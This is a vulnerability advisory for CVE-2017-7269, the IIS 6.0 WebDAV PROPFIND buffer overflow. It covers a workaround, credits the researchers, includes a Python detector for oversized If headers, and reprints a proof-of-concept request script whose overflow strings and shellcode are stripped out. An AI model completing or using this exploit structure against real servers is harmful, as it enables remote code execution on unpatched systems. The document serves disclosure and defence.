Vulnerability description

Microsoft has also confirmed the vulnerability: the ScStoragePathFromUrl function in the WebDAV service of IIS 6.0 on Windows Server 2003 R2 contains a buffer overflow. A remote attacker can execute arbitrary code by sending a PROPFIND request carrying a long header that begins with "If: <http://". The vulnerability has been exploited in the wild since July or August 2016.

Because the vulnerability is exposed as soon as the WebDAV service is enabled, the workaround available to current IIS 6.0 users is to disable the WebDAV service.
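As an added example (not part of the original advisory), the following Python checks a raw HTTP request for the request shape described above: a PROPFIND whose If header starts with `<http://` and is either unusually long or carries raw non-ASCII bytes. The length threshold and the sample requests are assumptions constructed for illustration.

```python
# Added detection example for the CVE-2017-7269 request shape; not from the advisory.
# Assumption: a benign WebDAV If header is short and percent-encoded, so an
# <http://...> resource tag that is very long or contains raw non-ASCII bytes
# is worth flagging at a proxy, IDS or log-review stage.
IF_HEADER_MAX_LEN = 256  # constructed threshold, tune for your environment

def parse_request(raw):
    """Split a raw HTTP request (bytes) into (method, {lowercase-name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return method, headers

def is_suspicious_propfind(raw):
    """Return a reason string if the request matches the overflow pattern, else None."""
    method, headers = parse_request(raw)
    if method != "PROPFIND":
        return None
    if_hdr = headers.get("if")
    if if_hdr is None or not if_hdr.startswith(b"<http://"):
        return None
    if len(if_hdr) > IF_HEADER_MAX_LEN:
        return "If header too long (%d bytes)" % len(if_hdr)
    if any(b > 0x7F for b in if_hdr):
        return "non-ASCII bytes in If header"
    return None

# Constructed sample requests: a normal locking PROPFIND and an oversized one.
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\n"
          b"If: <http://localhost/docs/> (<opaquelocktoken:abc>)\r\n"
          b"Content-Length: 0\r\n\r\n")
SUSPECT = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
           b"If: <http://localhost/" + b"a" * 400 + b">\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "->", is_suspicious_propfind(req))
```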

[Vulnerability Alert] IIS 6.0 remote code execution vulnerability CVE-2017-7269 - RadeBit瑞安全

Vulnerability ID

CVE-2017-7269

Other information

The ScStoragePathFromUrl function is called twice

Affected versions

Windows Server 2003 R2

Attack vector

Modified PROPFIND data

Discovered by

Zhiniang Peng and Chen Wu (Information Security Lab, School of Computer Science and Engineering, South China University of Technology)

PoC

#------------Our payload sets up a ROP chain by using the overflow 3 times. It will launch calc.exe, which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
# Python 2 script (print statement, str payload)
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 80))

# PROPFIND request whose If header carries the overlong resource tag
pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += 'If: <http://localhost/aaaaaaa'

# (long overflow string of escaped bytes removed)

pay += '>'
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'

# (second long overflow string of escaped bytes removed)

# (alphanumeric shellcode string removed)
shellcode = ''

pay += shellcode
pay += '>\r\n\r\n'

print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close()